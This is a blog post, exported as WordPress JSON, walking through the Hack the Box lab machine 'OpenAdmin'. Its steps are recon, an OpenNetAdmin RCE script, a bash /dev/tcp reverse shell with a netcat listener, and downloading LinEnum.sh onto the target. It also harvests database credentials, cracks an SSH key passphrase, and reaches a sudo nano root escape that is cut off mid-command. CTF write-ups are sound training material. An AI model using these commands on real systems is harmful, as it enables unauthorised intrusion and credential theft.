{"id":910,"date":"2020-05-18T06:30:02","date_gmt":"2020-05-18T05:30:02","guid":{"rendered":"http:\/\/zerothcode.com\/blog\/?p=910"},"modified":"2020-05-18T06:30:02","modified_gmt":"2020-05-18T05:30:02","slug":"hack-box-open-admin-box-walkthrough","status":"publish","type":"post","link":"https:\/\/zerothcode.com\/blog\/hack-box-open-admin-box-walkthrough\/","title":{"rendered":"Hack the Box: Open Admin Box Walkthrough"},"content":{"rendered":"<p>Admin Box Today, I am going to share a writeup for the boot2root challenge of the Hack the Box machine \u201cOPENADMIN\u201d which is a retired machine.<\/p>\n<p>It was actually an easy box based on the Linux machine and recently I have owned this system and got many new things to learn.<\/p>\n<h3><strong>Table of Content Admin Box<\/strong><\/h3>\n<p><strong>Recon<\/strong><\/p>\n<ul>\n<li>Nmap<\/li>\n<li>Dirb<\/li>\n<li>Python script ona-rce.py<\/li>\n<\/ul>\n<p><strong>Exploit<\/strong><\/p>\n<ul>\n<li>Netcat<\/li>\n<li>sh<\/li>\n<li>SSH_Key Brute force<\/li>\n<li>SSH login<\/li>\n<\/ul>\n<p><strong>Privilege Escalation<\/strong><\/p>\n<ul>\n<li>Abusing Sudo<\/li>\n<li>Capture the flag<\/li>\n<\/ul>\n<h3><strong>Walkthrough<\/strong><\/h3>\n<h3><strong>Recon<\/strong><\/h3>\n<p>Recon\u00a0is the act of\u00a0gathering\u00a0different kinds of\u00a0information\u00a0against the targeted victim or system.\u00a0 We can use various tools, techniques, and websites for the recon. Such as (Nmap, Dirsearch, Dirb etc) let\u2019s start with Nmap tool.<\/p>\n<p>We will start our recon by using Nmap scan to find the open ports and the version of our target.<\/p>\n<div id=\"crayon-5ec21a0be3d2b159144385\" class=\"crayon-syntax crayon-theme-familiar crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-5ec21a0be3d2b159144385-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-5ec21a0be3d2b159144385-1\" class=\"crayon-line\"><span class=\"crayon-v\">nmap<\/span> <span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">sV<\/span> <span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">Pn<\/span> <span class=\"crayon-cn\">10.10.10.171<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-iGrHdj-i7GE\/Xrw8Q3LAc_I\/AAAAAAAAkAs\/VndDjFKH6FAUJf4XmnRzYg9iDBtfDihDQCLcBGAsYHQ\/s1600\/1.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>We will also do fuzzing of endpoints using dirbuster tool using the command<\/p>\n<div id=\"crayon-5ec21a0be3d37850476262\" class=\"crayon-syntax crayon-theme-familiar crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-5ec21a0be3d37850476262-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-5ec21a0be3d37850476262-1\" class=\"crayon-line\"><span class=\"crayon-e\">dirb <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/10.10.10.171\/<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>and we got some directories like (artwork, music).<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-IospIk-vKWI\/Xrw8TxSbwqI\/AAAAAAAAkBU\/U9bsIVJCtzkqRy6iq1weFZkfIjn21f4KgCLcBGAsYHQ\/s1600\/2.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>After checking all the directories, we got one web page in which we found the login page.<\/p>\n<div id=\"crayon-5ec21a0be3d46609055374\" class=\"crayon-syntax crayon-theme-familiar crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-5ec21a0be3d46609055374-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-5ec21a0be3d46609055374-1\" class=\"crayon-line\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/10.10.10.171\/music<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-jOwiGg30APQ\/Xrw8WP4hCUI\/AAAAAAAAkBw\/jEygDrOP0JYicP63DajFnZm39qM6shMQwCLcBGAsYHQ\/s1600\/3.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Coming to the login page, we got the \u201copen net admin\u201d version let\u2019s recon about the \u201cona\u201d.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-PMb5ZKpul4Q\/Xrw8Wf39jlI\/AAAAAAAAkB0\/dn62W_d7Ync0C9HFna8W6yjLmh68tYQ3ACLcBGAsYHQ\/s1600\/4.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>After I did some recon, we got\u00a0<strong><a href=\"https:\/\/github.com\/amriunix\/ona-rce\">exploit<\/a>\u00a0<\/strong>for this system and this particular version.<\/p>\n<p>Let\u2019s download the code for the exploit and see how it works. The usage of this python code is very simple. Firstly, we need to check whether the URL is vulnerable or not and then we can exploit it easily by executing the same code.<\/p>\n<div id=\"crayon-5ec21a0be3d48856168299\" class=\"crayon-syntax crayon-theme-familiar crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-5ec21a0be3d48856168299-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-5ec21a0be3d48856168299-1\" class=\"crayon-line\"><span class=\"crayon-e\">python3 <\/span><span class=\"crayon-v\">ona<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rce<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">py <\/span><span class=\"crayon-e\">check <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/10.10.10.171\/ona\/<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-Azn0Zh9QOPA\/Xrw8Wntnc6I\/AAAAAAAAkB4\/dkHY0LhpnwcQGW8wlP7_cWyonALDI6NFACLcBGAsYHQ\/s1600\/6.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<h3><strong>Exploitation<\/strong><\/h3>\n<p>Since we did check for this exploit in the recon part and we got this URL is vulnerable to RCE. Using the below command, we will successfully exploit this URL. and yes, commands are executing successfully.<\/p>\n<div id=\"crayon-5ec21a0be3d4b661501692\" class=\"crayon-syntax crayon-theme-familiar crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-5ec21a0be3d4b661501692-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-5ec21a0be3d4b661501692-1\" class=\"crayon-line\"><span class=\"crayon-e\">python3 <\/span><span class=\"crayon-v\">ona<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rce<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">py <\/span><span class=\"crayon-e\">exploit <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/10.10.10.171\/ona\/<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><strong><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-hRgZkK2mphw\/Xrw8W6xqZ_I\/AAAAAAAAkB8\/I0R7tLEvyHw1VesMcJ_wA_4b0xX_SudhwCLcBGAsYHQ\/s1600\/7.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/strong><strong>\u00a0<\/strong><\/p>\n<p>Yes, we are connected to a remote host and our current user is www-data. Now using netcat listener, we will take the reverse shell from the host to further enumeration of this Linux box.<\/p>\n<div id=\"crayon-5ec21a0be3d4e746250596\" class=\"crayon-syntax crayon-theme-familiar crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-5ec21a0be3d4e746250596-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-5ec21a0be3d4e746250596-1\" class=\"crayon-line\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bash<\/span> <span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">c<\/span> <span class=\"crayon-s\">&#8216;bash -i &gt;&amp; \/dev\/tcp\/&lt;IP&gt;\/&lt;PORT&gt; 0&gt;&amp;1&#8217;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-FrRTnxfeq78\/Xrw8XE6tcOI\/AAAAAAAAkCA\/5Y-f0U3VT8EBSr5JghEVGFYZyq0WXY0ugCLcBGAsYHQ\/s1600\/8.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<div id=\"crayon-5ec21a0be3d50239053376\" class=\"crayon-syntax crayon-theme-familiar crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-5ec21a0be3d50239053376-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-5ec21a0be3d50239053376-1\" class=\"crayon-line\"><span class=\"crayon-v\">nc<\/span> <span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">lvp<\/span> <span class=\"crayon-cn\">1234<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>Here the connection stabilized successfully.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-uA_RwBzJVrk\/Xrw8XYxI76I\/AAAAAAAAkCE\/We2EjRbYr24I5p5Q5B29oCpIx3BSgjKFwCLcBGAsYHQ\/s1600\/9.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Let\u2019s start the enumeration of this machine. In the same present working directory first will enumerate and see what juicy data is there. Here we got many directories and let\u2019s check first what\u2019s there in the local directory.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-ZUsaymHPZTg\/Xrw8RH-cijI\/AAAAAAAAkAw\/53y19-ydfKYFQeIDCNswf911hvU16yHYACLcBGAsYHQ\/s1600\/10.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>After further enumeration in the same directory, we got a one php file \u201cdatabase_settings.inc.php\u201d.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-NeOOJSY_YX8\/Xrw8Qq2kQZI\/AAAAAAAAkAo\/YmG3222u4w8rnVYedl4UdcWAu4LWJ0TyQCLcBGAsYHQ\/s1600\/11.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Let\u2019s check what\u2019s there in this php file. Admin Box<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-HOA7xOAU7r0\/Xrw8RcWsdlI\/AAAAAAAAkA0\/IbFzFiQn_g4cpdcyuQCq21m6LA-2zb0kQCLcBGAsYHQ\/s1600\/12.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>So here we got some credentials for the database. Admin Box<\/p>\n<p>Now let\u2019s check how many users are present in the home directory of this machine. Here we got there are two users present in the machine and that is \u201cJimmy\u201d and \u201cJoanna\u201d. Admin Box<\/p>\n<p>In the process of recon, we have done the port scanning using Nmap scan as we know ssh port 22 is open.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-5gd2fBaABr8\/Xrw8R9KFyJI\/AAAAAAAAkA4\/ar3Tfzt_qfoWF-0R9LbM1xayrrfSHg1lQCLcBGAsYHQ\/s1600\/13.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Let\u2019s try to connect through ssh port for the user jimmy with the above password which we found in the database_settings.inc.php file.<\/p>\n<div id=\"crayon-5ec21a0be3d52005670775\" class=\"crayon-syntax crayon-theme-familiar crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-5ec21a0be3d52005670775-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-5ec21a0be3d52005670775-1\" class=\"crayon-line\"><span class=\"crayon-v\">ssh<\/span> <span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>And yes, we are in ????<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-2D8JJEbddig\/Xrw8SNztnII\/AAAAAAAAkA8\/8RGPtso6vY4clJJKBbqwHHFaIhImMozMwCLcBGAsYHQ\/s1600\/14.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Now we are connected to the jimmy user now for further enumeration we will first go to the \u201cvar\u201d directory, it\u2019s always good to enumerate the var directory.\u00a0 Doing enumeration, we got one directory called \/var\/www\/internal.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-_bme4KesKbI\/Xrw8SReLn5I\/AAAAAAAAkBA\/FzY1WMp6St0jaT89-8M472mjrXzfb6HPQCLcBGAsYHQ\/s1600\/15.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>So here we got main.php in the \/var\/www\/internal directory. now let\u2019s have a look what\u2019s present in the main.php.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-tCRob-wLdiE\/Xrw8SmMOY7I\/AAAAAAAAkBE\/ksqE2hc6B0g_A8RYEBf8drv7Gkmc6mudwCLcBGAsYHQ\/s1600\/16.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Here is one php code which tells us we need to find the location of Joanna\u2019s private ssh key.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-c5bV8IRWyRM\/Xrw8S4Dm9SI\/AAAAAAAAkBI\/jyD2FpmjkbMKJEFyl3jSnSaSbE93EsjfgCLcBGAsYHQ\/s1600\/17.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Now let\u2019s enumerate more for the location where we can get Joanna\u2019s ssh private key.<\/p>\n<p>Here we will use\u00a0<strong><a href=\"https:\/\/github.com\/rebootuser\/LinEnum\/blob\/master\/LinEnum.sh\">LinEnum.sh<\/a>,\u00a0<\/strong>This bash script is for enumerating the Linux machine to checks which services are running on the machine, privileges access, version information, system information, user information etc.<\/p>\n<ol>\n<li>Download the script or get the location where this script is stored.<\/li>\n<li>Host the python server and copy the link of the LinEnum.sh file.<\/li>\n<li>Download the script in the remote host using \u201cwget\u201d command in the \u201c\/var\/tmp\u201d directory.<\/li>\n<li>Change the permission of the LinEnum.sh shell script using \u201cchmod\u201d command.<\/li>\n<li>Now run the script in the remote machine. Admin Box<\/li>\n<\/ol>\n<div id=\"crayon-5ec21a0be3d55975273320\" class=\"crayon-syntax crayon-theme-familiar crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-5ec21a0be3d55975273320-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-5ec21a0be3d55975273320-1\" class=\"crayon-line\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">LinEnum<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sh<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-XOyUWd4JoVQ\/Xrw8TfVoiMI\/AAAAAAAAkBM\/QoAGi66vARgvTPevQ2rBx384bvB4gHKzQCLcBGAsYHQ\/s1600\/18.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>So here got some information after running the shell script LinEnum.sh<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-f2rqQlw444s\/Xrw8TjHOt1I\/AAAAAAAAkBQ\/yE5Ndm8FMWssVC7enG9Q5YXCsp3cEzyUwCLcBGAsYHQ\/s1600\/19.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Here ports 52846 and 3306 are open and in the listen to state, by using the curl command we will check that which above mention localhost port the main.php is getting executed. \u00a0By using the command. Admin Box<\/p>\n<div id=\"crayon-5ec21a0be3d57423591907\" class=\"crayon-syntax crayon-theme-familiar crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-5ec21a0be3d57423591907-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-5ec21a0be3d57423591907-1\" class=\"crayon-line\"><span class=\"crayon-e\">curl <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/127.0.0.1:52846\/main.php<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-09az-nwVWx8\/Xrw8UVDnQ_I\/AAAAAAAAkBY\/QMHv5aFvCE02TUrxJYYnp39ULsRB5SPzQCLcBGAsYHQ\/s1600\/20.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Here we successfully retrieve the ssh key using the 52846 port now save this key in your system.<\/p>\n<p>We got Joanna\u2019s ssh private key. Using this private ssh key we will switch the user jimmy to Joanna. first, we need to convert the private key into a hash using ssh2john.py and hash we can crack by using john the ripper tool. For more reference visit the\u00a0<strong><a href=\"https:\/\/www.hackingarticles.in\/beginners-guide-for-john-the-ripper-part-2\/\">article<\/a>.<\/strong><\/p>\n<div id=\"crayon-5ec21a0be3d5a657971901\" class=\"crayon-syntax crayon-theme-familiar crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-5ec21a0be3d5a657971901-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ec21a0be3d5a657971901-2\">2<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-5ec21a0be3d5a657971901-1\" class=\"crayon-line\"><span class=\"crayon-v\">python<\/span> <span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">share<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">john<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ssh2john<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">py <\/span><span class=\"crayon-v\">id_rsa<\/span> <span class=\"crayon-o\">&gt;&gt;<\/span> <span class=\"crayon-v\">hash<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">txt<\/span><\/div>\n<div id=\"crayon-5ec21a0be3d5a657971901-2\" class=\"crayon-line crayon-striped-line\"><span class=\"crayon-i\">john<\/span> \u2013<span class=\"crayon-v\">wordlist<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">share<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">wordlists<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">rockyou<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">txt <\/span><span class=\"crayon-v\">hash<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">txt<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-boOvMXDd9Kc\/Xrw8UnIPlzI\/AAAAAAAAkBc\/YHjMtwRBL-UwRhzt-CyiJGGP76kXWgVfACLcBGAsYHQ\/s1600\/21.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Successfully Cracked!! The passphrase is \u201cbloodninjas\u201d. Admin Box<\/p>\n<p><strong>Step 15:\u00a0<\/strong>\u00a0Let\u2019s switch to another user account Joanna. And use the passphrase \u201cbloodninjas\u201d<\/p>\n<div id=\"crayon-5ec21a0be3d6d409849721\" class=\"crayon-syntax crayon-theme-familiar crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-5ec21a0be3d6d409849721-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-5ec21a0be3d6d409849721-1\" class=\"crayon-line\"><span class=\"crayon-v\">ssh<\/span> <span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">i<\/span> <span class=\"crayon-e\">id_rsa <\/span><span class=\"crayon-v\">joanna<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-cn\">10.10.10.171<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/1.bp.blogspot.com\/-7hzhNzjD_OU\/Xrw8U3un1AI\/AAAAAAAAkBg\/MG5LnQBRMH87M11H1DRR-GuD7MuEE6-DACLcBGAsYHQ\/s1600\/22.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Yayyy!! ???? \u00a0Here we got our user hash for this machine.<\/p>\n<h3><strong>Privilege Escalation\u00a0 Admin Box<\/strong><\/h3>\n<p>Now moving towards the root flag, here we need to check the permission where user and root do not need a password to access any file throughout the remote machine, using the command<\/p>\n<div id=\"crayon-5ec21a0be3d72221723364\" class=\"crayon-syntax crayon-theme-familiar crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-5ec21a0be3d72221723364-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-5ec21a0be3d72221723364-1\" class=\"crayon-line\"><span class=\"crayon-v\">sudo<\/span> <span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">l<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/1.bp.blogspot.com\/-xSwY6v4iiT4\/Xrw8VaYKCbI\/AAAAAAAAkBk\/DKXxm7Hpbmw08j5ygdDNst9R2HY3QgM8wCLcBGAsYHQ\/s1600\/23.png?w=687&amp;ssl=1\" data-recalc-dims=\"1\" \/><\/p>\n<p>Here we got that we can access \/bin\/nano as root without password.<\/p>\n<p>Let\u2019s do a quick google search on the nano privilege escalation. we can take the shell from\u00a0<strong><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/nano\/\">GTFObins<\/a><\/strong>. we can open the \/opt\/priv file using the nano to escalate to the user to root<\/p>\n<p>We could escape our shell to root in the nano file. so let\u2019s run the same command as mentioned in the script itself.<\/p>\n<div id=\"crayon-5ec21a0be3d75005720592\" class=\"crayon-syntax crayon-theme-familiar crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"crayon-plain-wrap\"><\/div>\n<div class=\"crayon-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums \" data-settings=\"show\">\n<div class=\"crayon-nums-content\">\n<div class=\"crayon-num\" data-line=\"crayon-5ec21a0be3d75005720592-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\">\n<div id=\"crayon-5ec21a0be3d75005720592-1\" class=\"crayon-line\"><span class=\"crayon-v\">reset<\/span><span class=\"crayon-sy\">;<\/span> <span class=\"crayon-i\">sh<\/span> <span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&amp;<\/span><span 